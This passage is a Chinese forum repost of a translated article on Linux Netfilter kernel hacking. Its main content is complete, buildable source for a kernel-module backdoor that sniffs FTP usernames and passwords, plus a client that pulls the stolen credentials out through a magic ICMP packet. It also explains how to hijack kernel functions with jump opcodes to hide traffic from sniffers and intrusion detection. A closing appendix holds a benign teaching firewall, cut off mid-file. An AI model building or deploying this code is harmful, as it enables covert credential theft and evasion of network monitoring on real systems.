   最后,我们要做的是真正的复制我们想在的应答中送出的数据。到送出数据包的时候了,dev_queue_xmit()函数以一个指向sk_buff数据结构的指针作为它唯一的参数,在“好的错误”情况下,返回一个负的错误代码。我所说的“好的错误”是什么意思呢?如果你给函数dev_queue_xmit()一个错误构造的套接字缓冲,那么你就会得到一个伴随着内核错误和内核堆栈的dump信息的“不太好的错误”。看看在这里错误如何能被分成两组?最后,watch_in()返回NF_STOLEN,以告诉Netfilter忘掉它曾经见到过这个数据包。如果你已经调用了dev_queue_xmit(),不要返回NF_DROP!这是因为dev_queue_xmit()将释放传递进来的套接字缓冲,而Netfilter会尝试对被NF_DROP的数据包做同样的操作。好了。对于代码的讨论已经足够了,请看具体的代码。

------[ 5.2.1 - 源代码 : nfsniff.c



  1. <++>; nfsniff/nfsniff.c
  2. /* Simple proof-of-concept for kernel-based FTP password sniffer.
  3. * A captured Username and Password pair are sent to a remote host
  4. * when that host sends a specially formatted ICMP packet. Here we
  5. * shall use an ICMP_ECHO packet whose code field is set to 0x5B
  6. * *AND* the packet has enough
  7. * space after the headers to fit a 4-byte IP address and the
  8. * username and password fields which are a max. of 15 characters
  9. * each plus a NULL byte. So a total ICMP payload size of 36 bytes. */

  10. /* Written by bioforge,  March 2003 */

  11. #define MODULE
  12. #define __KERNEL__

  13. #include <linux/module.h>;
  14. #include <linux/kernel.h>;
  15. #include <linux/skbuff.h>;
  16. #include <linux/in.h>;
  17. #include <linux/ip.h>;
  18. #include <linux/tcp.h>;
  19. #include <linux/icmp.h>;
  20. #include <linux/netdevice.h>;
  21. #include <linux/netfilter.h>;
  22. #include <linux/netfilter_ipv4.h>;
  23. #include <linux/if_arp.h>;
  24. #include <linux/if_ether.h>;
  25. #include <linux/if_packet.h>;

  26. #define MAGIC_CODE   0x5B
  27. #define REPLY_SIZE   36

  28. #define ICMP_PAYLOAD_SIZE  (htons(sb->;nh.iph->;tot_len) \
  29.                    - sizeof(struct iphdr) \
  30.                    - sizeof(struct icmphdr))

  31. /* THESE values are used to keep the USERname and PASSword until
  32. * they are queried. Only one USER/PASS pair will be held at one
  33. * time and will be cleared once queried. */
  34. static char *username = NULL;
  35. static char *password = NULL;
  36. static int  have_pair = 0;     /* Marks if we already have a pair */

  37. /* Tracking information. Only log USER and PASS commands that go to the
  38. * same IP address and TCP port. */
  39. static unsigned int target_ip = 0;
  40. static unsigned short target_port = 0;

  41. /* Used to describe our Netfilter hooks */
  42. struct nf_hook_ops  pre_hook;           /* Incoming */
  43. struct nf_hook_ops  post_hook;           /* Outgoing */


  44. /* Function that looks at an sk_buff that is known to be an FTP packet.
  45. * Looks for the USER and PASS fields and makes sure they both come from
  46. * the one host as indicated in the target_xxx fields */
  47. static void check_ftp(struct sk_buff *skb)
  48. {
  49.    struct tcphdr *tcp;
  50.    char *data;
  51.    int len = 0;
  52.    int i = 0;
  53.    
  54.    tcp = (struct tcphdr *)(skb->;data + (skb->;nh.iph->;ihl * 4));
  55.    data = (char *)((int)tcp + (int)(tcp->;doff * 4));

  56.    /* Now, if we have a username already, then we have a target_ip.
  57.     * Make sure that this packet is destined for the same host. */
  58.    if (username)
  59.      if (skb->;nh.iph->;daddr != target_ip || tcp->;source != target_port)
  60.        return;
  61.    
  62.    /* Now try to see if this is a USER or PASS packet */
  63.    if (strncmp(data, "USER ", 5) == 0) {          /* Username */
  64.       data += 5;
  65.       
  66.       if (username)  return;
  67.       
  68.       while (*(data + i) != '\r' && *(data + i) != '\n'
  69.          && *(data + i) != '\0' && i < 15) {
  70.      len++;
  71.      i++;
  72.       }
  73.       
  74.       if ((username = kmalloc(len + 2, GFP_KERNEL)) == NULL)
  75.     return;
  76.       memset(username, 0x00, len + 2);
  77.       memcpy(username, data, len);
  78.       *(username + len) = '\0';           /* NULL terminate */
  79.    } else if (strncmp(data, "PASS ", 5) == 0) {   /* Password */
  80.       data += 5;

  81.       /* If a username hasn't been logged yet then don't try logging
  82.        * a password */
  83.       if (username == NULL) return;
  84.       if (password)  return;
  85.       
  86.       while (*(data + i) != '\r' && *(data + i) != '\n'
  87.          && *(data + i) != '\0' && i < 15) {
  88.      len++;
  89.      i++;
  90.       }

  91.       if ((password = kmalloc(len + 2, GFP_KERNEL)) == NULL)
  92.     return;
  93.       memset(password, 0x00, len + 2);
  94.       memcpy(password, data, len);
  95.       *(password + len) = '\0';           /* NULL terminate */
  96.    } else if (strncmp(data, "QUIT", 4) == 0) {
  97.       /* Quit command received. If we have a username but no password,
  98.        * clear the username and reset everything */
  99.       if (have_pair)  return;
  100.       if (username && !password) {
  101.      kfree(username);
  102.      username = NULL;
  103.      target_port = target_ip = 0;
  104.      have_pair = 0;
  105.      
  106.      return;
  107.       }
  108.    } else {
  109.       return;
  110.    }

  111.    if (!target_ip)
  112.      target_ip = skb->;nh.iph->;daddr;
  113.    if (!target_port)
  114.      target_port = tcp->;source;

  115.    if (username && password)
  116.      have_pair++;               /* Have a pair. Ignore others until
  117.                     * this pair has been read. */
  118. //   if (have_pair)
  119. //     printk("Have password pair!  U: %s   P: %s\n", username, password);
  120. }

  121. /* Function called as the POST_ROUTING (last) hook. It will check for
  122. * FTP traffic then search that traffic for USER and PASS commands. */
  123. static unsigned int watch_out(unsigned int hooknum,
  124.                   struct sk_buff **skb,
  125.                   const struct net_device *in,
  126.                   const struct net_device *out,
  127.                   int (*okfn)(struct sk_buff *))
  128. {
  129.    struct sk_buff *sb = *skb;
  130.    struct tcphdr *tcp;
  131.    
  132.    /* Make sure this is a TCP packet first */
  133.    if (sb->;nh.iph->;protocol != IPPROTO_TCP)
  134.      return NF_ACCEPT;               /* Nope, not TCP */
  135.    
  136.    tcp = (struct tcphdr *)((sb->;data) + (sb->;nh.iph->;ihl * 4));
  137.    
  138.    /* Now check to see if it's an FTP packet */
  139.    if (tcp->;dest != htons(21))
  140.      return NF_ACCEPT;               /* Nope, not FTP */
  141.    
  142.    /* Parse the FTP packet for relevant information if we don't already
  143.     * have a username and password pair. */
  144.    if (!have_pair)
  145.      check_ftp(sb);
  146.    
  147.    /* We are finished with the packet, let it go on its way */
  148.    return NF_ACCEPT;
  149. }


  150. /* Procedure that watches incoming ICMP traffic for the "Magic" packet.
  151. * When that is received, we tweak the skb structure to send a reply
  152. * back to the requesting host and tell Netfilter that we stole the
  153. * packet. */
  154. static unsigned int watch_in(unsigned int hooknum,
  155.                  struct sk_buff **skb,
  156.                  const struct net_device *in,
  157.                  const struct net_device *out,
  158.                  int (*okfn)(struct sk_buff *))
  159. {
  160.    struct sk_buff *sb = *skb;
  161.    struct icmphdr *icmp;
  162.    char *cp_data;               /* Where we copy data to in reply */
  163.    unsigned int   taddr;           /* Temporary IP holder */

  164.    /* Do we even have a username/password pair to report yet? */
  165.    if (!have_pair)
  166.      return NF_ACCEPT;
  167.      
  168.    /* Is this an ICMP packet? */
  169.    if (sb->;nh.iph->;protocol != IPPROTO_ICMP)
  170.      return NF_ACCEPT;
  171.    
  172.    icmp = (struct icmphdr *)(sb->;data + sb->;nh.iph->;ihl * 4);

  173.    /* Is it the MAGIC packet? */
  174.    if (icmp->;code != MAGIC_CODE || icmp->;type != ICMP_ECHO
  175.      || ICMP_PAYLOAD_SIZE < REPLY_SIZE) {
  176.       return NF_ACCEPT;
  177.    }
  178.    
  179.    /* Okay, matches our checks for "Magicness", now we fiddle with
  180.     * the sk_buff to insert the IP address, and username/password pair,
  181.     * swap IP source and destination addresses and ethernet addresses
  182.     * if necessary and then transmit the packet from here and tell
  183.     * Netfilter we stole it. Phew... */
  184.    taddr = sb->;nh.iph->;saddr;
  185.    sb->;nh.iph->;saddr = sb->;nh.iph->;daddr;
  186.    sb->;nh.iph->;daddr = taddr;

  187.    sb->;pkt_type = PACKET_OUTGOING;

  188.    switch (sb->;dev->;type) {
  189.     case ARPHRD_PPP:               /* No fiddling needs doing */
  190.       break;
  191.     case ARPHRD_LOOPBACK:
  192.     case ARPHRD_ETHER:
  193.     {
  194.        unsigned char t_hwaddr[ETH_ALEN];
  195.       
  196.        /* Move the data pointer to point to the link layer header */
  197.        sb->;data = (unsigned char *)sb->;mac.ethernet;
  198.        sb->;len += ETH_HLEN; //sizeof(sb->;mac.ethernet);
  199.        memcpy(t_hwaddr, (sb->;mac.ethernet->;h_dest), ETH_ALEN);
  200.        memcpy((sb->;mac.ethernet->;h_dest), (sb->;mac.ethernet->;h_source),
  201.           ETH_ALEN);
  202.        memcpy((sb->;mac.ethernet->;h_source), t_hwaddr, ETH_ALEN);
  203.   
  204.        break;
  205.     }
  206.    };

  207.    /* Now copy the IP address, then Username, then password into packet */
  208.    cp_data = (char *)((char *)icmp + sizeof(struct icmphdr));
  209.    memcpy(cp_data, &target_ip, 4);
  210.    if (username)
  211.      memcpy(cp_data + 4, username, 16);
  212.    if (password)
  213.      memcpy(cp_data + 20, password, 16);
  214.    
  215.    /* This is where things will die if they are going to.
  216.     * Fingers crossed... */
  217.    dev_queue_xmit(sb);

  218.    /* Now free the saved username and password and reset have_pair */
  219.    kfree(username);
  220.    kfree(password);
  221.    username = password = NULL;
  222.    have_pair = 0;
  223.    
  224.    target_port = target_ip = 0;

  225. //   printk("Password retrieved\n");
  226.    
  227.    return NF_STOLEN;
  228. }

  229. int init_module()
  230. {
  231.    pre_hook.hook     = watch_in;
  232.    pre_hook.pf       = PF_INET;
  233.    pre_hook.priority = NF_IP_PRI_FIRST;
  234.    pre_hook.hooknum  = NF_IP_PRE_ROUTING;
  235.    
  236.    post_hook.hook     = watch_out;
  237.    post_hook.pf       = PF_INET;
  238.    post_hook.priority = NF_IP_PRI_FIRST;
  239.    post_hook.hooknum  = NF_IP_POST_ROUTING;
  240.    
  241.    nf_register_hook(&pre_hook);
  242.    nf_register_hook(&post_hook);
  243.    
  244.    return 0;
  245. }

  246. void cleanup_module()
  247. {
  248.    nf_unregister_hook(&post_hook);
  249.    nf_unregister_hook(&pre_hook);
  250.    
  251.    if (password)
  252.      kfree(password);
  253.    if (username)
  254.      kfree(username);
  255. }
  256. <-->;
复制代码


------[ 5.2.2 - 源代码 : getpass.c



  1. <++>; nfsniff/getpass.c
  2. /* getpass.c - simple utility to get username/password pair from
  3. * the Netfilter backdoor FTP sniffer. Very kludgy, but effective.
  4. * Mostly stripped from my source for InfoPig.
  5. *
  6. * Written by bioforge  -  March 2003 */

  7. #include <sys/types.h>;
  8. #include <stdio.h>;
  9. #include <stdlib.h>;
  10. #include <unistd.h>;
  11. #include <string.h>;
  12. #include <errno.h>;
  13. #include <sys/socket.h>;
  14. #include <netdb.h>;
  15. #include <arpa/inet.h>;

  16. #ifndef __USE_BSD
  17. # define __USE_BSD               /* We want the proper headers */
  18. #endif
  19. # include <netinet/ip.h>;
  20. #include <netinet/ip_icmp.h>;

  21. /* Function prototypes */
  22. static unsigned short checksum(int numwords, unsigned short *buff);

  23. int main(int argc, char *argv[])
  24. {
  25.     unsigned char dgram[256];           /* Plenty for a PING datagram */
  26.     unsigned char recvbuff[256];
  27.     struct ip *iphead = (struct ip *)dgram;
  28.     struct icmp *icmphead = (struct icmp *)(dgram + sizeof(struct ip));
  29.     struct sockaddr_in src;
  30.     struct sockaddr_in addr;
  31.     struct in_addr my_addr;
  32.     struct in_addr serv_addr;
  33.     socklen_t src_addr_size = sizeof(struct sockaddr_in);
  34.     int icmp_sock = 0;
  35.     int one = 1;
  36.     int *ptr_one = &
  37.    
  38.     if (argc < 3) {
  39.     fprintf(stderr, "Usage:  %s remoteIP myIP\n", argv[0]);
  40.     exit(1);
  41.     }

  42.     /* Get a socket */
  43.     if ((icmp_sock = socket(PF_INET, SOCK_RAW, IPPROTO_ICMP)) < 0) {
  44.     fprintf(stderr, "Couldn't open raw socket! %s\n",
  45.         strerror(errno));
  46.     exit(1);
  47.     }

  48.     /* set the HDR_INCL option on the socket */
  49.     if(setsockopt(icmp_sock, IPPROTO_IP, IP_HDRINCL,
  50.           ptr_one, sizeof(one)) < 0) {
  51.     close(icmp_sock);
  52.     fprintf(stderr, "Couldn't set HDRINCL option! %s\n",
  53.             strerror(errno));
  54.     exit(1);
  55.     }
  56.    
  57.     addr.sin_family = AF_INET;
  58.     addr.sin_addr.s_addr = inet_addr(argv[1]);
  59.    
  60.     my_addr.s_addr = inet_addr(argv[2]);
  61.    
  62.     memset(dgram, 0x00, 256);
  63.     memset(recvbuff, 0x00, 256);
  64.    
  65.     /* Fill in the IP fields first */
  66.     iphead->;ip_hl  = 5;
  67.     iphead->;ip_v   = 4;
  68.     iphead->;ip_tos = 0;
  69.     iphead->;ip_len = 84;
  70.     iphead->;ip_id  = (unsigned short)rand();
  71.     iphead->;ip_off = 0;
  72.     iphead->;ip_ttl = 128;
  73.     iphead->;ip_p   = IPPROTO_ICMP;
  74.     iphead->;ip_sum = 0;
  75.     iphead->;ip_src = my_addr;
  76.     iphead->;ip_dst = addr.sin_addr;
  77.    
  78.     /* Now fill in the ICMP fields */
  79.     icmphead->;icmp_type = ICMP_ECHO;
  80.     icmphead->;icmp_code = 0x5B;
  81.     icmphead->;icmp_cksum = checksum(42, (unsigned short *)icmphead);
  82.    
  83.     /* Finally, send the packet */
  84.     fprintf(stdout, "Sending request...\n");
  85.     if (sendto(icmp_sock, dgram, 84, 0, (struct sockaddr *)&addr,
  86.            sizeof(struct sockaddr)) < 0) {
  87.     fprintf(stderr, "\nFailed sending request! %s\n",
  88.         strerror(errno));
  89.     return 0;
  90.     }

  91.     fprintf(stdout, "Waiting for reply...\n");
  92.     if (recvfrom(icmp_sock, recvbuff, 256, 0, (struct sockaddr *)&src,
  93.          &src_addr_size) < 0) {
  94.     fprintf(stdout, "Failed getting reply packet! %s\n",
  95.         strerror(errno));
  96.     close(icmp_sock);
  97.     exit(1);
  98.     }
  99.    
  100.     iphead = (struct ip *)recvbuff;
  101.     icmphead = (struct icmp *)(recvbuff + sizeof(struct ip));
  102.     memcpy(&serv_addr, ((char *)icmphead + 8),
  103.            sizeof (struct in_addr));
  104.    
  105.     fprintf(stdout, "Stolen for ftp server %s:\n", inet_ntoa(serv_addr));
  106.     fprintf(stdout, "Username:    %s\n",
  107.          (char *)((char *)icmphead + 12));
  108.     fprintf(stdout, "Password:    %s\n",
  109.          (char *)((char *)icmphead + 28));
  110.    
  111.     close(icmp_sock);
  112.    
  113.     return 0;
  114. }

  115. /* Checksum-generation function. It appears that PING'ed machines don't
  116. * reply to PINGs with invalid (ie. empty) ICMP Checksum fields...
  117. * Fair enough I guess. */
  118. static unsigned short checksum(int numwords, unsigned short *buff)
  119. {
  120.    unsigned long sum;
  121.    
  122.    for(sum = 0;numwords >; 0;numwords--)
  123.      sum += *buff++;   /* add next word, then increment pointer */
  124.    
  125.    sum = (sum >;>; 16) + (sum & 0xFFFF);
  126.    sum += (sum >;>; 16);
  127.    
  128.    return ~sum;
  129. }
  130. <-->;

  131.     ** 译注:上述两个文件的Makefile:

  132. <++>; nfsniff/Makefile
  133. #Makefile                                             
  134. #                                                      
  135.                                                       
  136. CFLAGS=-Wall                                          
  137. LIBS=-L/usr/lib -lc
  138. # Change include directory for your kernel                                   
  139. MODULE_CFLAGS=-I/usr/src/custom/linux-2.4.18-3/include
  140. MODULE_CFLAGS+=$(CFLAGS)                              
  141. EXECUTE_CFLAGS=-ggdb                                   
  142. EXECUTE_CFLAGS+=$(CFLAGS)                              
  143.                                                       
  144. all : nfsniff.o getpass                                
  145. nfsniff.o : nfsniff.c                                 
  146.         gcc -c nfsniff.c -o nfsniff~.o $(MODULE_CFLAGS)
  147.         ld -r -o nfsniff.o nfsniff~.o $(LIBS)         
  148. getpass.o : getpass.c                                 
  149.         gcc -c getpass.c $(EXECUTE_CFLAGS)            
  150. getpass : getpass.o                                    
  151.         gcc -o getpass getpass.o $(EXECUTE_CFLAGS)     
  152. clean :                                                
  153.         rm -f *.o getpass                              
  154. <-->;

  155.     **译注完
复制代码

   

--[ 6 - 在Libpcap中隐藏网络通信

    这一节简短的描述,如何在修改Linux的内核,使与匹配预先定义的条件的网络通信对运行于本机的数据包嗅探工具不可见。列在本文最后的是可以正常运行的代码,它实现了隐藏所有来自或者是去往指定的IP地址的数据包的功能。好了,让我们开始...
   
----[ 6.1 - SOCK_PACKET、SOCK_RAW与Libpcap

    对系统管理员来说,最有用的软件莫过于哪些在广义分类下被称为“数据包嗅探器”的软件了。两个最典型的通用数据包嗅探器是tcpdump(1)以及ethereal(1)。这两个软件都利用了Libpcap库(随着参考文献[1]中的tcpdump发布)来抓取原始数据包。网络入侵检测系统(NIDS)也利用了Libpcap库。SNORT需要Libpcap,Libnids——一个提供IP重组和TCP流跟踪的NIDS开发库(参见参考文献[2]),也是如此。
   
    在Linux系统下,Libpcap库使用SOCK_PACKET接口。Packet套接字是一种特殊的套接字,它可以用于发生和接收链路层的原始数据包。关于Paket套接字有很多话题,但是由于本节讨论的是关于如何隐藏它们而不是如何利用它们,感兴趣的读者可以直接去看packet(7)手册页。对于本文中的讨论,只需要理解packet套接字被Libpcap应用程序用于获取进入或者离开本地主机的原始数据包。
   
    当核心网络堆栈收到一个数据包的时候,检查该数据包是否是某个packet套接字感兴趣的数据包。如果是,则将该数据递交给那些对其感兴趣的套接字。如果不是,该数据包继续它的旅程,进入TCP、UDP或者其它类型的套接字。对于SOCK_RAW类型的套接字同样如此。原始套接字很类似于packet套接字,只是原始套接字不提供链路层的包头。一个利用原始套接字的实用程序的例子是我的SYNalert程序,参见参考文献[3](请原谅我在这儿插入的题外话
   
    到此,你应该已经了解了Linux下的数据包嗅探软件使用了Libpcap库。Libpcap在Linux下利用packet套接字接口来获取包含链路层包头的原始数据包。同时提到了原始套接字,它提供给用户空间的应用程序获取包含IP头的数据包的方法。下一节将讨论如何通过Linux核心模块来隐藏来自这些packet套接字以及原始套接字的网络通信。
   
   
------[ 6.2 给狼披上羊皮

    当收到数据包并将其送到一个packet套接字时,packet_rcv()函数被调用。这个函数可以在net/packet/af_packet.c中找到,packet_rcv()负责使数据包经过所有应用于目的套接字的套接字过滤器,并最终将其递交到用户空间。为了隐藏来自packet套接字的数据包,我们需要阻止所有特定数据包调用packet_rcv()函数。我们如何做到这一点?当然是优秀的ol式的函数劫持了。
   
    函数劫持的基本操作是:如果我们知道一个内核函数,甚至是那些没有被导出的函数,的入口地址,我们可以在使实际的代码运行前将这个函数重定位到其他的位置。为了达到这样的目的,我们首先要从这个函数的开始,保存其原来的指令字节,然后将它们换成跳转到我们的代码处执行的绝对跳转指令。例如以i386汇编语言实现该操作如下:
   

  1.     movl  (address of our function),  %eax
  2.     jmp   *eax

  3.     这些指令的16进制代码如下(假设我们的函数地址为0):
  4.    
  5.     0xb8 0x00 0x00 0x00 0x00
  6.     0xff 0xe0
复制代码


    如果我们在Linux核心模块的初始化时将上例中的函数地址替换为我们的hook函数的地址,我们就能够使我们的hook函数先运行。当我们想运行原来的函数时,我们只需要在开始时恢复函数原来的指令,调用该函数并且替换我们的劫持代码。简单而有效。Silvio Cesare 不久前写过一篇文章,讲述如何实现内核函数劫持,参见参考文献[4]。
   
    要从packet套接字隐藏数据包,我们首先要写一个hook函数,用于检查数据包是否满足我们隐藏的标准。如果满足,那么我们的hook函数简单的向它的调用函数返回0,packet_rcv()永远不会被调用。如果packet_rcv()永远不被调用,那么这个数据包也永远都不会递交给用户空间的packet套接字。注意,只是对于"packet"套接字来说,该数据包被丢弃了。如果我们要过滤送到packet套接字的FTP数据包,那么FTP服务器的TCP套接字仍然能收到这些数据包。我们所做的一切只是使运行在本机上的嗅探软件无法看到这些数据包。FTP服务器仍然能够处理和记录连接。
   
    理论上就是这么多,关于原始套接字的用法同理可得。不同的是我们需要hook的是raw_rcv()函数(在net/ipv4/raw.c中可以找到)。下一节将给出并讨论一个Linux核心模块的示例代码,该代码劫持packet_rcv()函数和raw_rcv()函数,隐藏任何来自或去往我们指定的IP地址的数据包。
   

--[ 7 - 结束语

    希望你现在至少对Netfilter有了一个初步的了解,如何使用它以及你能用它来做什么。你同样也应当有了一些使特定的网络通信从运行在本机的嗅探软件中隐藏的知识了。如果你需要本文中涉及的源代码的tar包,请直接给我发email。我同样很乐意接收任何的指正、批评或者建议。好了,把一切都留给你和你的想象力,来做一些我在这儿展现的有趣的事吧!

[ 本帖最后由 衍水狂客 于 2007-1-10 14:22 编辑 ]

论坛徽章:
0
2 [报告]
发表于 2004-02-20 13:46 |只看该作者

深入Linux网络核心堆栈!

--[ A - 轻量级防火墙
----[ A.1 - 概述

    轻量级防火墙(LWFW)是一个简单的内核模块,用于演示我们在第4节中涉及的基本的数据包过录技术。LWFW也通过ioctl()系统调用提供了一个控制接口。
   
    由于LWFW的源代码已经有足够的文档了,我在这儿只给出它如何工作的简单概述。当LWFW模块被加载后,它的第一个任务就是尝试注册控制设置。注意在LWFW的ioctl()控制接口可用之前,需要在/dev下创建一个字符设备文件。如果控制设备注册成功,"in use"标志被清除并且对NF_IP_PRE_ROUTE进行hook的函数被注册。清除函数执行相反的操作。
   
    LWFW对数据包丢弃提供三个基本的选项。按照处理的顺序列出如下:
    -- 源接口
    -- 源IP地址
    -- 目的TCP端口
   
    这些规则的设置由ioctl()接口完成。当一个数据包被接收,LWFW按照我们设定的规则进行检查。如果匹配了其中的任意一条规则,那么hook函数将返回NF_DROP,然后Netfilter将悄无声息的丢弃这个数据包。否则,hook函数返回NF_ACCEPT,数据包将继续它的旅程。
   
    最后,有必要提一下的是LWFW的统计日志。无论任何时候数据包进入hook函数,LWFW都将收到的数据包的计数累加。单独的规则检查函数负责增加它们各自的丢弃的数据包的计数。注意,当规则的值被改变时,它的丢弃数据包的计数被重置为0。lwfwstats程序利用LWFW_GET_STATS这个IOCTL来获取统计数据结构的一个副本并显示其内容。
   

----[ A.2 - 源代码 : lwfw.c

  1. <++>; lwfw/lwfw.c
  2. /* Light-weight Fire Wall. Simple firewall utility based on
  3. * Netfilter for 2.4. Designed for educational purposes.
  4. *
  5. * Written by bioforge  -  March 2003.
  6. */

  7. #define MODULE
  8. #define __KERNEL__

  9. #include <linux/module.h>;
  10. #include <linux/kernel.h>;
  11. #include <linux/net.h>;
  12. #include <linux/types.h>;
  13. #include <linux/skbuff.h>;
  14. #include <linux/string.h>;
  15. #include <linux/malloc.h>;
  16. #include <linux/netdevice.h>;
  17. #include <linux/netfilter.h>;
  18. #include <linux/netfilter_ipv4.h>;
  19. #include <linux/in.h>;
  20. #include <linux/ip.h>;
  21. #include <linux/tcp.h>;

  22. #include <asm/errno.h>;
  23. #include <asm/uaccess.h>;

  24. #include "lwfw.h"

  25. /* Local function prototypes */
  26. static int set_if_rule(char *name);
  27. static int set_ip_rule(unsigned int ip);
  28. static int set_port_rule(unsigned short port);
  29. static int check_ip_packet(struct sk_buff *skb);
  30. static int check_tcp_packet(struct sk_buff *skb);
  31. static int copy_stats(struct lwfw_stats *statbuff);

  32. /* Some function prototypes to be used by lwfw_fops below. */
  33. static int lwfw_ioctl(struct inode *inode, struct file *file,
  34.               unsigned int cmd, unsigned long arg);
  35. static int lwfw_open(struct inode *inode, struct file *file);
  36. static int lwfw_release(struct inode *inode, struct file *file);


  37. /* Various flags used by the module */
  38. /* This flag makes sure that only one instance of the lwfw device
  39. * can be in use at any one time. */
  40. static int lwfw_ctrl_in_use = 0;

  41. /* This flag marks whether LWFW should actually attempt rule checking.
  42. * If this is zero then LWFW automatically allows all packets. */
  43. static int active = 0;

  44. /* Specifies options for the LWFW module */
  45. static unsigned int lwfw_options = (LWFW_IF_DENY_ACTIVE
  46.                     | LWFW_IP_DENY_ACTIVE
  47.                     | LWFW_PORT_DENY_ACTIVE);

  48. static int major = 0;               /* Control device major number */

  49. /* This struct will describe our hook procedure. */
  50. struct nf_hook_ops nfkiller;

  51. /* Module statistics structure */
  52. static struct lwfw_stats lwfw_statistics = {0, 0, 0, 0, 0};

  53. /* Actual rule 'definitions'. */
  54. /* TODO:  One day LWFW might actually support many simultaneous rules.
  55. * Just as soon as I figure out the list_head mechanism... */
  56. static char *deny_if = NULL;                 /* Interface to deny */
  57. static unsigned int deny_ip = 0x00000000;    /* IP address to deny */
  58. static unsigned short deny_port = 0x0000;   /* TCP port to deny */

  59. /*
  60. * This is the interface device's file_operations structure
  61. */
  62. struct file_operations  lwfw_fops = {
  63.    NULL,
  64.      NULL,
  65.      NULL,
  66.      NULL,
  67.      NULL,
  68.      NULL,
  69.      lwfw_ioctl,
  70.      NULL,
  71.      lwfw_open,
  72.      NULL,
  73.      lwfw_release,
  74.      NULL                   /* Will be NULL'ed from here... */
  75. };

  76. MODULE_AUTHOR("bioforge");
  77. MODULE_DESCRIPTION("Light-Weight Firewall for Linux 2.4");

  78. /*
  79. * This is the function that will be called by the hook
  80. */
  81. unsigned int lwfw_hookfn(unsigned int hooknum,
  82.                struct sk_buff **skb,
  83.                const struct net_device *in,
  84.                const struct net_device *out,
  85.                int (*okfn)(struct sk_buff *))
  86. {
  87.    unsigned int ret = NF_ACCEPT;
  88.    
  89.    /* If LWFW is not currently active, immediately return ACCEPT */
  90.    if (!active)
  91.      return NF_ACCEPT;
  92.    
  93.    lwfw_statistics.total_seen++;
  94.    
  95.    /* Check the interface rule first */
  96.    if (deny_if && DENY_IF_ACTIVE) {
  97.       if (strcmp(in->;name, deny_if) == 0) {   /* Deny this interface */
  98.      lwfw_statistics.if_dropped++;
  99.      lwfw_statistics.total_dropped++;
  100.      return NF_DROP;
  101.       }
  102.    }
  103.    
  104.    /* Check the IP address rule */
  105.    if (deny_ip && DENY_IP_ACTIVE) {
  106.       ret = check_ip_packet(*skb);
  107.       if (ret != NF_ACCEPT) return ret;
  108.    }
  109.    
  110.    /* Finally, check the TCP port rule */
  111.    if (deny_port && DENY_PORT_ACTIVE) {
  112.       ret = check_tcp_packet(*skb);
  113.       if (ret != NF_ACCEPT) return ret;
  114.    }
  115.    
  116.    return NF_ACCEPT;               /* We are happy to keep the packet */
  117. }

  118. /* Function to copy the LWFW statistics to a userspace buffer */
  119. static int copy_stats(struct lwfw_stats *statbuff)
  120. {
  121.    NULL_CHECK(statbuff);

  122.    copy_to_user(statbuff, &lwfw_statistics,
  123.         sizeof(struct lwfw_stats));
  124.    
  125.    return 0;
  126. }

  127. /* Function that compares a received TCP packet's destination port
  128. * with the port specified in the Port Deny Rule. If a processing
  129. * error occurs, NF_ACCEPT will be returned so that the packet is
  130. * not lost. */
  131. static int check_tcp_packet(struct sk_buff *skb)
  132. {
  133.    /* Seperately defined pointers to header structures are used
  134.     * to access the TCP fields because it seems that the so-called
  135.     * transport header from skb is the same as its network header TCP packets.
  136.     * If you don't believe me then print the addresses of skb->;nh.iph
  137.     * and skb->;h.th.
  138.     * It would have been nicer if the network header only was IP and
  139.     * the transport header was TCP but what can you do? */
  140.    struct tcphdr *thead;
  141.    
  142.    /* We don't want any NULL pointers in the chain to the TCP header. */
  143.    if (!skb ) return NF_ACCEPT;
  144.    if (!(skb->;nh.iph)) return NF_ACCEPT;

  145.    /* Be sure this is a TCP packet first */
  146.    if (skb->;nh.iph->;protocol != IPPROTO_TCP) {
  147.       return NF_ACCEPT;
  148.    }

  149.    thead = (struct tcphdr *)(skb->;data + (skb->;nh.iph->;ihl * 4));
  150.    
  151.    /* Now check the destination port */
  152.    if ((thead->;dest) == deny_port) {
  153.       /* Update statistics */
  154.       lwfw_statistics.total_dropped++;
  155.       lwfw_statistics.tcp_dropped++;
  156.       
  157.       return NF_DROP;
  158.    }
  159.    
  160.    return NF_ACCEPT;
  161. }

  162. /* Function that compares a received IPv4 packet's source address
  163. * with the address specified in the IP Deny Rule. If a processing
  164. * error occurs, NF_ACCEPT will be returned so that the packet is
  165. * not lost. */
  166. static int check_ip_packet(struct sk_buff *skb)
  167. {
  168.    /* We don't want any NULL pointers in the chain to the IP header. */
  169.    if (!skb ) return NF_ACCEPT;
  170.    if (!(skb->;nh.iph)) return NF_ACCEPT;
  171.    
  172.    if (skb->;nh.iph->;saddr == deny_ip) {/* Matches the address. Barf. */
  173.       lwfw_statistics.ip_dropped++;    /* Update the statistics */
  174.       lwfw_statistics.total_dropped++;
  175.       
  176.       return NF_DROP;
  177.    }
  178.    
  179.    return NF_ACCEPT;
  180. }

  181. static int set_if_rule(char *name)
  182. {
  183.    int ret = 0;
  184.    char *if_dup;               /* Duplicate interface */
  185.    
  186.    /* Make sure the name is non-null */
  187.    NULL_CHECK(name);
  188.    
  189.    /* Free any previously saved interface name */
  190.    if (deny_if) {
  191.       kfree(deny_if);
  192.       deny_if = NULL;
  193.    }
  194.    
  195.    if ((if_dup = kmalloc(strlen((char *)name) + 1, GFP_KERNEL))
  196.         == NULL) {
  197.       ret = -ENOMEM;
  198.    } else {
  199.       memset(if_dup, 0x00, strlen((char *)name) + 1);
  200.       memcpy(if_dup, (char *)name, strlen((char *)name));
  201.    }

  202.    deny_if = if_dup;
  203.    lwfw_statistics.if_dropped = 0;     /* Reset drop count for IF rule */
  204.    printk("LWFW: Set to deny from interface: %s\n", deny_if);
  205.    
  206.    return ret;
  207. }

  208. static int set_ip_rule(unsigned int ip)
  209. {
  210.    deny_ip = ip;
  211.    lwfw_statistics.ip_dropped = 0;     /* Reset drop count for IP rule */
  212.    
  213.    printk("LWFW: Set to deny from IP address: %d.%d.%d.%d\n",
  214.       ip & 0x000000FF, (ip & 0x0000FF00) >;>; 8,
  215.       (ip & 0x00FF0000) >;>; 16, (ip & 0xFF000000) >;>; 24);
  216.    
  217.    return 0;
  218. }

  219. static int set_port_rule(unsigned short port)
  220. {
  221.    deny_port = port;
  222.    lwfw_statistics.tcp_dropped = 0;    /* Reset drop count for TCP rule */
  223.    
  224.    printk("LWFW: Set to deny for TCP port: %d\n",
  225.       ((port & 0xFF00) >;>; 8 | (port & 0x00FF) << 8));
  226.       
  227.    return 0;
  228. }

  229. /*********************************************/
